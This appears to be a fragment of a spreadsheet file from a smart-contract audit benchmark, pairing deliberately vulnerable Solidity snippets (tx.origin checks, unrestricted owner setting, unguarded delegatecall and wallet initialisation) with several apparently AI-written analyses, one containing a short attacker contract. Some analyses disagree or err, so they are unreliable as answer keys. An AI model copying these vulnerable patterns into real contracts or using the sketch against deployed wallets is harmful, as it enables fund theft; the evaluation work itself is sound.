- Alternatively, consider using the OpenZeppelin's Ownable contract or a similar well-reviewed and audited access control solution.
- Always perform thorough code reviews and security audits before deploying smart contracts to the mainnet.</t>
  </si>
  <si>
    <t>dataset/access_control/multiowned_vulnerable.sol</t>
  </si>
  <si>
    <t xml:space="preserve">  function newOwner(address _owner) external returns (bool) {
    require(_owner != 0);
    owners[_owner] = msg.sender;
    return true;
  }</t>
  </si>
  <si>
    <t>Alright, let's start by examining the content of the provided Solidity file.
Alright, I've reviewed the Solidity code. Here's a breakdown:
1. **Are there any vulnerabilities?**
   Yes.
2. **how this vulnerability can be exploited :**
   a. **Loose Ownership Mechanism**: 
      - In the `newOwner` function, any existing owner (or the root owner) can add another owner without any other owner's consent.
      - In the `deleteOwner` function, while an owner can only remove someone they added, the root can remove any owner. This can potentially cause a lot of confusion and power struggles, especially in a system where ownership should be more rigidly defined.
   b. **Unprotected Ether Withdrawal**: 
      - The `withdrawAll` function allows any owner to withdraw all the contract's ether balance. If one malicious owner is added, they could drain all the funds.
   c. **Missing Event Logs**: 
      - The contract does not emit any events when ownership is changed (either added or removed). This makes tracking and monitoring changes to ownership more difficult.
3. **The business impact of these vulnerabilities in one sentence:**
   - **Loose Ownership Mechanism**: Ambiguous ownership system can lead to unintended access control.
   - **Unprotected Ether Withdrawal**: Malicious or compromised owner can drain funds leading to potential financial loss.
   - **Missing Event Logs**: Lack of transparency and traceability in ownership changes can hinder system monitoring and auditing.
4. **The potential solutions of these vulnerabilities:**
   a. **Loose Ownership Mechanism**: 
      - Implement a more rigorous ownership system where adding or removing an owner requires a consensus or a multi-signature mechanism.
   b. **Unprotected Ether Withdrawal**: 
      - Implement a withdrawal limit or require multiple confirmations from different owners before allowing withdrawal of large amounts.
   c. **Missing Event Logs**: 
      - Add `event` declarations and emit events whenever ownership is changed, funds are withdrawn, or other significant state changes occur in the contract.
Would you like more detailed explanations or any other recommendations?</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
- The function `newOwner` allows any external entity to call it and set a new owner. This means that anyone can take ownership of any address they wish by calling this function.
- The function checks if `_owner` is not `0`, but it doesn't check if `msg.sender` is an authorized entity to change the owner or not.
3. The business impact of these vulnerabilities in one sentence:
The `newOwner` function leads to unauthorized takeover of address ownership.
4. The potential solutions of these vulnerabilities:
- Restrict the access to the `newOwner` function. Only authorized accounts (e.g., the contract owner or administrators) should be able to call this function.
- Instead of directly assigning the sender to the owners mapping, consider implementing a two-step ownership transfer where the new owner has to accept the ownership.
- Add a condition to check if `_owner` is not the zero address using `require(_owner != address(0));` instead of `require(_owner != 0);` for clarity and accuracy.</t>
  </si>
  <si>
    <t>"Alright, I'll start by reviewing the provided Solidity code. Once I've analyzed it, I'll address each of the points you've mentioned in the requested format.
Upon reviewing the provided Solidity code, here's a breakdown:
The code seems to define a contract called `MultiOwnable` that allows for a multi-ownership pattern. The main features of this contract include:
1. Defining an `onlyOwner` modifier to restrict function access to owners.
2. Allowing the creation of new owners using the `newOwner` function.
3. Permitting the deletion of owners using the `deleteOwner` function.
The `TestContract` is a child contract of `MultiOwnable` that allows:
1. Withdrawing all funds from the contract if the sender is an owner.
2. A fallback function to accept Ether.
Now, I'll address your questions:
1. Are there any access control vulnerabilities?
Let's analyze.
1. **Are there any access control vulnerabilities?**
   - Yes.
2. **how this vulnerability can be exploited :**
   - The `newOwner` function allows any address (even non-owners) to add new owners. This is problematic as it means that a malicious entity can add themselves as an owner.
   - The `deleteOwner` function allows an owner to delete another owner if they were the one who added them. However, there is a loophole: the `root` owner (i.e., the contract creator) can delete any owner. If the `root` account is compromised, it can lead to unauthorized deletions.
3. **The business impact of these vulnerabilities in one sentence:**
   - Unauthorized addition of owners can lead to unauthorized fund withdrawals, and compromised root access can result in the removal of legitimate owners.
4. **The potential solutions of these vulnerabilities:**
   - Restrict the `newOwner` function to be callable only by existing owners or implement a more rigorous system for adding new owners, such as multi-signature approval.
   - Consider implementing a more structured ownership system where owners have different levels or roles. This way, high-level decisions (like adding or deleting owners) would require consensus or multi-signature approval.
   - For the `deleteOwner` function, implement multi-signature requirements or consensus mechanisms to prevent unilateral deletion by the `root`.
   - Regularly rotate the `root` account's private key or use a hardware wallet to ensure its security."</t>
  </si>
  <si>
    <t>1. Are there any access control vulnerabilities? 
Answer: Yes.
2. how this vulnerability can be exploited :
The function `newOwner` allows any external actor (even those who are not current owners) to set a new owner address and map it to the `msg.sender`. This essentially means anyone can add themselves or any other address as an owner without any checks or permissions.
3. The business impact of these vulnerabilities in one sentence: 
The `newOwner` function leads to unauthorized ownership assignments.
4. The potential solutions of these vulnerabilities:
- Implement an access control mechanism where only authorized addresses (like current owners or administrators) are allowed to add new owners.
- Consider using the OpenZeppelin library's `Ownable` contract or a multisig contract if multiple owners are required. These have well-vetted and commonly used ownership patterns in the Ethereum community.
- Always have code reviews and security audits for smart contracts to catch such issues.</t>
  </si>
  <si>
    <t>dataset/access_control/mycontract.sol</t>
  </si>
  <si>
    <t xml:space="preserve">    function sendTo(address receiver, uint amount) public {
        require(tx.origin == owner);
        receiver.transfer(amount);
    }</t>
  </si>
  <si>
    <t>Let's start by examining the provided Solidity code. I will read the content of the file and analyze it.
I have analyzed the provided Solidity code. Here's the breakdown:
1. Are there any vulnerabilities? 
   - **Yes.**
2. how this vulnerability can be exploited :
   - The `sendTo` function uses `tx.origin` to validate whether the caller is the owner.
3. The business impact of these vulnerabilities in one sentence:
   - The usage of `tx.origin` for authentication can allow malicious contracts to perform actions on behalf of the original sender, potentially leading to unauthorized fund transfers.
4. The potential solutions for these vulnerabilities:
   - Replace the `tx.origin` check with `msg.sender` to validate the direct caller of the function.
   - Implement a more robust ownership pattern, such as the OpenZeppelin's Ownable pattern, which provides a clear and secure way to manage contract ownership.
Would you like me to delve deeper into any specific aspect of this analysis?</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
   - The use of `tx.origin` instead of `msg.sender` can introduce security vulnerabilities.
   - The lack of checks on the `amount` being transferred can result in unintended transfers if not handled properly outside this function.
3. The business impact of these vulnerabilities in one sentence:
   - Misuse of `tx.origin` can allow malicious contracts to deceive the function, and missing amount checks could lead to unintended fund transfers.
4. The potential solutions of these vulnerabilities:
   - Replace `tx.origin` with `msg.sender` to ensure only the direct caller can pass the condition. This way, even if a malicious contract tricks a user into invoking it, the malicious contract cannot misuse the `sendTo` function.
   - Add checks on the `amount` to ensure it is within expected bounds, and consider checking the balance before attempting a transfer.
   - Always ensure adequate testing and security reviews before deploying contracts on the mainnet.</t>
  </si>
  <si>
    <t>Alright, I will now read the provided Solidity code and analyze it for any potential access control vulnerabilities.
Based on the provided Solidity code:
1. Are there any access control vulnerabilities?
   **Yes.**
2. how this vulnerability can be exploited :
   - The function `sendTo` uses `tx.origin` for access control instead of `msg.sender`. 
3. The business impact of these vulnerabilities in one sentence:
   - Using `tx.origin` for authorization in the `sendTo` function leads to potential manipulation by malicious contracts.
4. The potential solutions of this vulnerabilities:
   - Replace the check `require(tx.origin == owner);` with `require(msg.sender == owner);` to ensure that the direct caller of the function (and not the origin of the transaction) is the owner of the contract.</t>
  </si>
  <si>
    <t>1. Are there any access control vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
The use of `tx.origin` instead of `msg.sender` for authentication can be exploited by malicious contracts. An attacker can create a malicious contract that calls the `sendTo` function indirectly, and `tx.origin` will still point to the original external caller, not the malicious contract.
Here's a basic example:
```solidity
contract MaliciousContract {
    TargetContract target;
    constructor(TargetContract _target) {
        target = _target;
    }
    function attack() public {
        target.sendTo(msg.sender, 1 ether);
    }
}
```
When the `attack` function is called by an external actor (who is also the owner of the `TargetContract`), the `tx.origin` will point to this actor, and the `sendTo` function will successfully transfer funds, even though it was indirectly called by the `MaliciousContract`.
3. The business impact of these vulnerabilities in one sentence:
The use of `tx.origin` for authentication allows unintended actors to potentially bypass security checks and withdraw funds, leading to financial losses.
4. The potential solutions of these vulnerabilities:
Replace `tx.origin` with `msg.sender` for access control checks. This ensures that only the direct caller of the function (not the original external actor) is checked against the `owner` variable. The updated code would look like:
```solidity
function sendTo(address receiver, uint amount) public {
    require(msg.sender == owner);
    receiver.transfer(amount);
}
```
Additionally, it's a good practice to avoid relying solely on the `owner` for such critical functions and to implement more sophisticated access control mechanisms, like using the OpenZeppelin's Ownable or AccessControl libraries.</t>
  </si>
  <si>
    <t>dataset/access_control/parity_wallet_bug_1.sol</t>
  </si>
  <si>
    <t xml:space="preserve">  function initWallet(address[] _owners, uint _required, uint _daylimit) {
    initDaylimit(_daylimit);
    initMultiowned(_owners, _required);
  }</t>
  </si>
  <si>
    <t>Let's begin by reading and examining the provided Solidity code.
The code is lengthy, but I've extracted and examined the main sections. Let's now analyze the code for potential vulnerabilities.
1. **Are there any vulnerabilities?**
Yes.
2. **how this vulnerability can be exploited :**
   - The most striking vulnerability is the **delegatecall** in the fallback function without strict checks:
     ```solidity
     function() payable {
       if (msg.value &gt; 0)
         Deposit(msg.sender, msg.value);
       else if (msg.data.length &gt; 0)
         _walletLibrary.delegatecall(msg.data);
     }
     ```
     The issue here is that **delegatecall** is used in an unchecked manner. Anyone can send arbitrary data, and if that data matches a function signature in `_walletLibrary`, then that function will be executed with the context of the current contract. This means that if the `_walletLibrary` has a malicious function or if an attacker can set `_walletLibrary` to a malicious contract, they can exploit the contract.
   - The address `_walletLibrary` is set to a constant that looks placeholder-like (`0xcafecafecafecafecafecafecafecafecafecafe`). This address should be verified as secure. If this is a placeholder, the actual address should be properly set before the contract is deployed.
3. **The business impact of these vulnerabilities in one sentence:**
   - The unchecked **delegatecall** function leads to potential manipulation of the contract storage or execution of unintended functionalities.
   - Using a placeholder or unverified address for `_walletLibrary` can lead to unexpected behavior or malicious attacks.
4. **The potential solutions of these vulnerabilities:**
   - For the **delegatecall** vulnerability: Only allow specific functions to be called via **delegatecall**, or implement strict checks before using **delegatecall**. Do not allow arbitrary data to decide the function calls.
   - For the `_walletLibrary` constant address: Ensure that the address is set to a verified, secure contract before deploying this contract. Avoid using placeholder addresses. 
Further, there might be additional vulnerabilities based on how the `_walletLibrary` is implemented, which is not provided in this code. It's essential to review that as well.</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
**Answer:** Yes.
2. how this vulnerability can be exploited :
The `initWallet` function initializes the wallet by setting up the owners, required confirmations, and daily limit. However, there are a couple of concerns:
   a. **No Access Control:** There is no restriction on who can call this function. Without proper access controls, any user can potentially reset the wallet's configuration.
   b. **Reentrancy:** If the functions `initDaylimit` and `initMultiowned` call external contracts or send Ether, it might open up the contract to reentrancy attacks, but this depends on their implementations which are not provided here.
3. The business impact of these vulnerabilities in one sentence:
   - Lack of function access control leads to unauthorized configuration changes.
   - Potential reentrancy vulnerabilities can drain funds or manipulate contract state.
4. The potential solutions to these vulnerabilities:
   a. **No Access Control:**
      - Introduce a modifier (e.g., `onlyOwner`) to ensure that only the contract owner or a designated authority can call this function.
      - Ensure that this function can only be called once, for instance, by using a boolean state variable like `isInitialized`. If it is already true, the function should revert any further calls.
   b. **Reentrancy:**
      - If `initDaylimit` and `initMultiowned` make external calls, ensure that state changes are made before any external calls.
      - Use the `reentrancyGuard` modifier or a similar mechanism to prevent reentrant calls.</t>
  </si>
  <si>
    <t>Let's start by reading and analyzing the provided Solidity code.
The code is quite extensive, so I'll break down its components and then assess any potential access control vulnerabilities.
1. **Contracts**:
    - `WalletEvents`: This contract only defines events that are related to a wallet's operations.
    - `WalletAbi`: This contract specifies the ABI (Application Binary Interface) of the Wallet, which is essentially the list of functions and their signatures that the Wallet contract will expose.
    - `Wallet`: This seems to be the main contract, which implements a multi-signature wallet. It uses a library (whose address is set to a placeholder value of `0xcafecafecafecafecafecafecafecafecafecafe`).
2. **Key Observations**:
    - The Wallet contract uses `delegatecall` to call into a library (`_walletLibrary`). This library is expected to provide implementations for several of the functions.
    - The fallback function in the Wallet contract also uses `delegatecall` to the library. It gets triggered when the contract receives ether or if a function is called on the Wallet contract that isn't explicitly defined in it.
3. **Access Control**:
    - A quick first pass over the code doesn't show the typical `onlyOwner` or similar modifiers that restrict function access.
    - The use of `delegatecall` can be risky as it allows calling functions in an external library, executing them in the context of the calling contract. This means the library can alter the state variables of the Wallet contract.
Given this initial understanding, let's analyze the access control vulnerabilities.
1. **Are there any access control vulnerabilities?**
    - Yes.
2. **how this vulnerability can be exploited :**
    - The use of `delegatecall` in the fallback function is concerning. If the `_walletLibrary` address is set to a malicious contract, this contract can alter the state of the Wallet, such as changing the list of owners, the required number of signatures, or other critical parameters. Essentially, any function can be called with any parameters, allowing for potential takeover or misuse of the wallet.
    - There's no explicit access control on critical functions like `changeOwner`, `addOwner`, `removeOwner`, and `changeRequirement`. Without seeing the library's code, it's uncertain how these functions are protected.
3. **The business impact of these vulnerabilities in one sentence:**
    - The lack of stringent access control mechanisms, combined with the usage of `delegatecall`, can lead to a potential takeover of the wallet, unauthorized fund transfers, or alterations in the wallet's configuration.
4. **The potential solutions of these vulnerabilities:**
    - Implement strict access control mechanisms, such as `onlyOwner` or `onlyManyOwners` modifiers, to restrict access to critical functions.
    - Be cautious with the use of `delegatecall`. Ensure that the library being called is trusted, immutable, and has undergone thorough security reviews.
    - Consider removing the `delegatecall` from the fallback function or adding explicit access control to the fallback to ensure only expected calls can be made.
    - Regularly audit and monitor the wallet and associated library contracts for any unexpected behaviors or state changes.
Note: It's essential to review the library's code (`_walletLibrary`) to get a full understanding of potential vulnerabilities, as the current assessment is based on the partial code provided.</t>
  </si>
  <si>
    <t>1. Are there any access control vulnerabilities?
**Yes.**
2. how this vulnerability can be exploited :
- The `initWallet` function does not have any access control modifiers like `onlyOwner` or `onlyAdmin`. This means any address can call this function and potentially re-initialize the owners, required number of confirmations, and day limit.
- It is unclear from the provided snippet whether `initDaylimit` and `initMultiowned` have their own access control in place. Assuming they do not, this compounds the problem.
3. The business impact of these vulnerabilities in one sentence:
- Unauthorized access to the `initWallet` function leads to potential changes in wallet ownership and transaction settings.
4. The potential solutions of this vulnerabilities:
- Introduce a modifier like `onlyOwner` or `onlyAdmin` to ensure that only authorized addresses can call `initWallet`.
- Ensure that the `initDaylimit` and `initMultiowned` functions also have appropriate access controls if they don't already.
- Consider having a flag that prevents the `initWallet` function from being called more than once. Once the wallet is initialized, this flag can be set to prevent further initializations.</t>
  </si>
  <si>
    <t xml:space="preserve">  function execute(address _to, uint _value, bytes _data) external onlyowner returns (bytes32 o_hash) {
    if ((_data.length == 0 &amp;&amp; underLimit(_value)) || m_required == 1) {
      address created;
      if (_to == 0) {
        created = create(_value, _data);
      } else {
        if (!_to.call.value(_value)(_data))
          throw;
      }
      SingleTransact(msg.sender, _value, _to, _data, created);
    } else {
      o_hash = sha3(msg.data, block.number);
      if (m_txs[o_hash].to == 0 &amp;&amp; m_txs[o_hash].value == 0 &amp;&amp; m_txs[o_hash].data.length == 0) {
        m_txs[o_hash].to = _to;
        m_txs[o_hash].value = _value;
        m_txs[o_hash].data = _data;
      }
      if (!confirm(o_hash)) {
        ConfirmationNeeded(o_hash, msg.sender, _value, _to, _data);
      }
    }
  }</t>
  </si>
  <si>
    <t>(the same as above) "Let's begin by reading and examining the provided Solidity code.
The code is lengthy, but I've extracted and examined the main sections. Let's now analyze the code for potential vulnerabilities.
1. **Are there any vulnerabilities?**
Yes.
2. **how this vulnerability can be exploited :**
   - The most striking vulnerability is the **delegatecall** in the fallback function without strict checks:
     ```solidity
     function() payable {
       if (msg.value &gt; 0)
         Deposit(msg.sender, msg.value);
       else if (msg.data.length &gt; 0)
         _walletLibrary.delegatecall(msg.data);
     }
     ```
     The issue here is that **delegatecall** is used in an unchecked manner. Anyone can send arbitrary data, and if that data matches a function signature in `_walletLibrary`, then that function will be executed with the context of the current contract. This means that if the `_walletLibrary` has a malicious function or if an attacker can set `_walletLibrary` to a malicious contract, they can exploit the contract.
   - The address `_walletLibrary` is set to a constant that looks placeholder-like (`0xcafecafecafecafecafecafecafecafecafecafe`). This address should be verified as secure. If this is a placeholder, the actual address should be properly set before the contract is deployed.
3. **The business impact of these vulnerabilities in one sentence:**
   - The unchecked **delegatecall** function leads to potential manipulation of the contract storage or execution of unintended functionalities.
   - Using a placeholder or unverified address for `_walletLibrary` can lead to unexpected behavior or malicious attacks.
4. **The potential solutions of these vulnerabilities:**
   - For the **delegatecall** vulnerability: Only allow specific functions to be called via **delegatecall**, or implement strict checks before using **delegatecall**. Do not allow arbitrary data to decide the function calls.
   - For the `_walletLibrary` constant address: Ensure that the address is set to a verified, secure contract before deploying this contract. Avoid using placeholder addresses. 
Further, there might be additional vulnerabilities based on how the `_walletLibrary` is implemented, which is not provided in this code. It's essential to review that as well."</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
**Yes**
2. how this vulnerability can be exploited :
   - The function uses the `call.value()` method with user-supplied data (`_data`). This exposes the contract to reentrancy attacks.
   - The use of `throw` is deprecated and can consume all gas, causing denial of service. It's better to use `revert()` or `require()`.
   - The use of `sha3` is deprecated. It's better to use `keccak256`.
3. The business impact of these vulnerabilities in one sentence:
   - Unprotected `call.value()` leads to potential reentrancy attacks, and deprecated constructs like `throw` and `sha3` can lead to unexpected behavior or vulnerabilities.
4. The potential solutions of these vulnerabilities:
   - To prevent reentrancy attacks, make sure to use the checks-effects-interactions pattern. You should first change the state and then transfer the ether.
   - Replace `throw` with `revert()` or `require()` for better error handling and gas efficiency.
   - Replace `sha3` with `keccak256` to be in line with current best practices.</t>
  </si>
  <si>
    <t>(the same as above)"Let's start by reading and analyzing the provided Solidity code.
The code is quite extensive, so I'll break down its components and then assess any potential access control vulnerabilities.
1. **Contracts**:
    - `WalletEvents`: This contract only defines events that are related to a wallet's operations.
    - `WalletAbi`: This contract specifies the ABI (Application Binary Interface) of the Wallet, which is essentially the list of functions and their signatures that the Wallet contract will expose.
    - `Wallet`: This seems to be the main contract, which implements a multi-signature wallet. It uses a library (whose address is set to a placeholder value of `0xcafecafecafecafecafecafecafecafecafecafe`).
2. **Key Observations**:
    - The Wallet contract uses `delegatecall` to call into a library (`_walletLibrary`). This library is expected to provide implementations for several of the functions.
    - The fallback function in the Wallet contract also uses `delegatecall` to the library. It gets triggered when the contract receives ether or if a function is called on the Wallet contract that isn't explicitly defined in it.
3. **Access Control**:
    - A quick first pass over the code doesn't show the typical `onlyOwner` or similar modifiers that restrict function access.
    - The use of `delegatecall` can be risky as it allows calling functions in an external library, executing them in the context of the calling contract. This means the library can alter the state variables of the Wallet contract.
Given this initial understanding, let's analyze the access control vulnerabilities.
1. **Are there any access control vulnerabilities?**
    - Yes.
2. **how this vulnerability can be exploited :**
    - The use of `delegatecall` in the fallback function is concerning. If the `_walletLibrary` address is set to a malicious contract, this contract can alter the state of the Wallet, such as changing the list of owners, the required number of signatures, or other critical parameters. Essentially, any function can be called with any parameters, allowing for potential takeover or misuse of the wallet.
    - There's no explicit access control on critical functions like `changeOwner`, `addOwner`, `removeOwner`, and `changeRequirement`. Without seeing the library's code, it's uncertain how these functions are protected.
3. **The business impact of these vulnerabilities in one sentence:**
    - The lack of stringent access control mechanisms, combined with the usage of `delegatecall`, can lead to a potential takeover of the wallet, unauthorized fund transfers, or alterations in the wallet's configuration.
4. **The potential solutions of these vulnerabilities:**
    - Implement strict access control mechanisms, such as `onlyOwner` or `onlyManyOwners` modifiers, to restrict access to critical functions.
    - Be cautious with the use of `delegatecall`. Ensure that the library being called is trusted, immutable, and has undergone thorough security reviews.
    - Consider removing the `delegatecall` from the fallback function or adding explicit access control to the fallback to ensure only expected calls can be made.
    - Regularly audit and monitor the wallet and associated library contracts for any unexpected behaviors or state changes.
Note: It's essential to review the library's code (`_walletLibrary`) to get a full understanding of potential vulnerabilities, as the current assessment is based on the partial code provided."</t>
  </si>
  <si>
    <t>1. **Are there any access control vulnerabilities?** 
   Yes.
2. **how this vulnerability can be exploited :**
   a. The line `if (!_to.call.value(_value)(_data))` makes a low-level call to another contract. This method is prone to reentrancy attacks if not protected properly.
   b. The function makes use of the `throw` statement, which is deprecated in newer versions of Solidity. Using `throw` causes the whole transaction to revert, wasting all the gas sent with it.
   c. The use of `sha3` has been replaced by `keccak256` in newer versions of Solidity, so it's also a potential issue, even though it's not directly related to access control.
3. **The business impact of these vulnerabilities in one sentence:** 
   The `execute` function can be exploited for reentrancy attacks, leading to potential unauthorized fund withdrawal or manipulation of contract state.
4. **The potential solutions of this vulnerabilities:**
   a. To prevent reentrancy attacks, use the "Checks-Effects-Interactions" pattern. This means you should rearrange the function such that all external calls (interactions) are done at the end.
   b. Replace `throw` with the `revert()` function. This provides a cleaner way to handle error situations without wasting as much gas.
   c. Update the use of `sha3` to `keccak256` for better clarity and to stay in line with newer Solidity standards.</t>
  </si>
  <si>
    <t>same as above</t>
  </si>
  <si>
    <t xml:space="preserve">  function() payable {
    if (msg.value &gt; 0)
      Deposit(msg.sender, msg.value);
    else if (msg.data.length &gt; 0)
      _walletLibrary.delegatecall(msg.data);
  }</t>
  </si>
  <si>
    <t>1. **Are there any access control vulnerabilities?** 
Yes.
2. **how this vulnerability can be exploited :**
The function does not have any access control mechanism, which means anyone can call it. The most concerning part is the line:
```solidity
_walletLibrary.delegatecall(msg.data);
```
This line uses `delegatecall` with `msg.data` as its argument. `delegatecall` is a mechanism in Solidity that allows one contract to execute the code of another contract, while preserving the state of the calling contract. If an attacker sends crafted `msg.data` to this function, they can potentially exploit the `_walletLibrary`'s functions in unintended ways, if not properly handled.
3. **The business impact of these vulnerabilities in one sentence:**
Unrestricted use of `delegatecall` leads to potential arbitrary code execution in the context of the main contract.
4. **The potential solutions of this vulnerabilities:**
- Introduce access control, such as only allowing the owner or authorized addresses to execute this function.
- Be cautious with the use of `delegatecall`. Ideally, avoid using user-supplied input (like `msg.data` in this case) directly with `delegatecall`. Instead, consider wrapping the intended functionality in specific, well-defined functions.
- Audit and review the `_walletLibrary` contract to ensure all its functions are safe and cannot be exploited when called through `delegatecall`.</t>
  </si>
  <si>
    <t>"1. **Are there any access control vulnerabilities?** 
Yes.
2. **how this vulnerability can be exploited :**
The function does not have any access control mechanism, which means anyone can call it. The most concerning part is the line:
```solidity
_walletLibrary.delegatecall(msg.data);
```
This line uses `delegatecall` with `msg.data` as its argument. `delegatecall` is a mechanism in Solidity that allows one contract to execute the code of another contract, while preserving the state of the calling contract. If an attacker sends crafted `msg.data` to this function, they can potentially exploit the `_walletLibrary`'s functions in unintended ways, if not properly handled.
3. **The business impact of these vulnerabilities in one sentence:**
Unrestricted use of `delegatecall` leads to potential arbitrary code execution in the context of the main contract.
4. **The potential solutions of this vulnerabilities:**
- Introduce access control, such as only allowing the owner or authorized addresses to execute this function.
- Be cautious with the use of `delegatecall`. Ideally, avoid using user-supplied input (like `msg.data` in this case) directly with `delegatecall`. Instead, consider wrapping the intended functionality in specific, well-defined functions.
- Audit and review the `_walletLibrary` contract to ensure all its functions are safe and cannot be exploited when called through `delegatecall`."</t>
  </si>
  <si>
    <t>dataset/access_control/parity_wallet_bug_2.sol</t>
  </si>
  <si>
    <t xml:space="preserve">  function initWallet(address[] _owners, uint _required, uint _daylimit) only_uninitialized {
    initDaylimit(_daylimit);
    initMultiowned(_owners, _required);
  }</t>
  </si>
  <si>
    <t>Alright, I'll start by reading and analyzing the provided Solidity code.
1. Are there any vulnerabilities? 
**Answer**: Yes.
2. how this vulnerability can be exploited :
The provided code seems to be an excerpt from the Parity multi-sig wallet code which had a well-known vulnerability related to the delegatecall function in the `initWallet` function (this function is not fully visible in the provided excerpt, but there are hints suggesting its existence). The issue is the unchecked use of the `delegatecall` in the context of a library-like contract. An attacker can exploit this by calling `initWallet` after they have taken control of the contract, thereby gaining the ability to steal funds.
The vulnerability lies in the fact that:
- The contract is designed to be a "library" contract where its functions are intended to be called using `delegatecall`.
- When a contract is used with `delegatecall`, its code is executed in the context of the calling contract, which means it can modify the state of the calling contract.
- The `initWallet` function can be called multiple times, allowing an attacker to re-initialize and claim ownership of the wallet.
3. The business impact of these vulnerabilities in one sentence: 
The `initWallet` function leads to potential theft of all funds in the multi-signature wallet.
4. The potential solutions of these vulnerabilities:
- Ensure that initialization functions can only be called once. This can be achieved by using a state variable (like `bool initialized`) that checks whether the contract has already been initialized.
- Avoid using delegatecall unless necessary. If used, it should be done with caution and a thorough understanding of its implications.
- Always have contracts, especially those handling funds, audited by professional smart contract auditors before deploying them in a production environment.
- Consider using a well-established multi-signature wallet implementation that has undergone rigorous testing and auditing, rather than rolling out your own.</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
**Answer**: Yes.
2. how this vulnerability can be exploited :
   - The function `initWallet` can be called by any address as there's no explicit access control (like `onlyOwner` or similar) beyond the `only_uninitialized` modifier.
   - The function does not check if `_owners` array is empty or if `_required` is 0 or if `_required` is greater than the number of `_owners`.
   - The function does not validate if `_daylimit` is within a valid range.
3. The business impact of these vulnerabilities in one sentence:
   - Lack of proper validation and access control in the `initWallet` function leads to potential misuse and incorrect initialization of the smart contract.
4. The potential solutions of these vulnerabilities:
   - Introduce an access control mechanism (like `onlyOwner`) to ensure that only the intended address can call the `initWallet` function.
   - Add validation checks to ensure that `_owners` is not an empty array and that `_required` is greater than 0 and less than or equal to the number of `_owners`.
   - Add validation checks to ensure that `_daylimit` is within an acceptable range (if applicable based on business logic). 
Note: The vulnerabilities identified are based on the code snippet provided. A full review of the entire contract is recommended for comprehensive security analysis.</t>
  </si>
  <si>
    <t>Alright, let's start by reading and understanding the provided Solidity code from the file "parity_wallet_bug_2.sol".
From the provided Solidity code, here's a brief overview:
1. The code starts with a comment section that describes the purpose of the contract: a multi-sig wallet with daily-limited transaction capabilities.
2. The `WalletEvents` contract defines various events that can be emitted by the main wallet contract, such as Confirmation, Revoke, OwnerChanged, RequirementChanged, Deposit, SingleTransact, MultiTransact, and ConfirmationNeeded.
3. The `WalletAbi` contract seems to define an interface, though the content is truncated, so I cannot see the full details.
4. The main contract, which doesn't have a defined name in the provided code, includes several functions and variables related to managing multi-sig operations, changing owners, and managing daily limits.
Now, let's analyze the code for any potential access control vulnerabilities.
1. Are there any access control vulnerabilities?
**Answer**: Yes.
2. how this vulnerability can be exploited :
- The function `execute` seems to have a logic that allows an owner to execute a transaction without requiring multiple confirmations if the transaction value is under the daily limit. This can lead to unauthorized transactions if an owner's private key is compromised.
- The function `underLimit` checks if the daily limit has been exceeded. There's a potential issue here if the daily limit is set to a very high value or if an attacker can manipulate the `m_spentToday` value.
- The contract doesn't have a defined constructor. Without it, there's a risk that important initialization logic (like setting the initial owners or the required number of confirmations for a transaction) might be missed, leading to vulnerabilities.
- There is a constant address `_walletLibrary` that seems to be set to an arbitrary address (`0xcafecafecafecafecafecafecafecafecafecafe`). If this address has any functionality associated with it in the real network, it might pose a security risk.
3. The business impact of these vulnerabilities in one sentence:
- The `execute` function leads to unauthorized transactions under the daily limit without multiple confirmations.
- The `underLimit` function can potentially allow transactions that exceed the intended daily limit.
- The missing constructor can result in uninitialized or misconfigured contract state.
- The arbitrary `_walletLibrary` address can pose unknown risks if associated with any real functionality.
4. The potential solutions of these vulnerabilities:
- For the `execute` function, ensure that all multi-sig requirements are enforced regardless of the transaction value. Alternatively, have stricter rules or alerts for transactions that are near the daily limit.
- For the `underLimit` function, ensure proper validation and checks for overflow and underflow. Use libraries like SafeMath for arithmetic operations.
- Implement a constructor that handles all necessary initializations for the contract.
- Ensure that any hardcoded addresses like `_walletLibrary` are valid, trusted, and serve a clear purpose. Avoid using arbitrary or placeholder addresses.</t>
  </si>
  <si>
    <t>1. Are there any access control vulnerabilities? 
Answer: Yes.
2. how this vulnerability can be exploited :
- The function `initWallet` does not have any access control modifier other than `only_uninitialized`. This means that anyone can call this function as long as the condition for `only_uninitialized` is met. There's no control over who can set or change the owners of the wallet, the required number of owners for transactions, or the daylimit for the wallet.
3. The business impact of these vulnerabilities in one sentence:
- Lack of proper access controls in `initWallet` function leads to unauthorized users potentially setting or changing important wallet parameters.
4. The potential solutions to these vulnerabilities:
- Introduce an access control modifier (e.g., `onlyOwner`) to the `initWallet` function to ensure that only authorized users can initialize or modify the wallet's parameters.
- Consider initializing these parameters during contract deployment to avoid the need for a separate initialization function or to ensure that the initialization can only be done once and by a trusted party.
- Regularly audit the smart contract for security vulnerabilities and ensure best practices are followed in smart contract development.</t>
  </si>
  <si>
    <t xml:space="preserve">  function kill(address _to) onlymanyowners(sha3(msg.data)) external {
    suicide(_to);
  }</t>
  </si>
  <si>
    <t>(the same as above)Alright, I'll start by reading and analyzing the provided Solidity code.
1. Are there any vulnerabilities? 
**Answer**: Yes.
2. how this vulnerability can be exploited :
The provided code seems to be an excerpt from the Parity multi-sig wallet code which had a well-known vulnerability related to the delegatecall function in the `initWallet` function (this function is not fully visible in the provided excerpt, but there are hints suggesting its existence). The issue is the unchecked use of the `delegatecall` in the context of a library-like contract. An attacker can exploit this by calling `initWallet` after they have taken control of the contract, thereby gaining the ability to steal funds.
The vulnerability lies in the fact that:
- The contract is designed to be a "library" contract where its functions are intended to be called using `delegatecall`.
- When a contract is used with `delegatecall`, its code is executed in the context of the calling contract, which means it can modify the state of the calling contract.
- The `initWallet` function can be called multiple times, allowing an attacker to re-initialize and claim ownership of the wallet.
3. The business impact of these vulnerabilities in one sentence: 
The `initWallet` function leads to potential theft of all funds in the multi-signature wallet.
4. The potential solutions of these vulnerabilities:
- Ensure that initialization functions can only be called once. This can be achieved by using a state variable (like `bool initialized`) that checks whether the contract has already been initialized.
- Avoid using delegatecall unless necessary. If used, it should be done with caution and a thorough understanding of its implications.
- Always have contracts, especially those handling funds, audited by professional smart contract auditors before deploying them in a production environment.
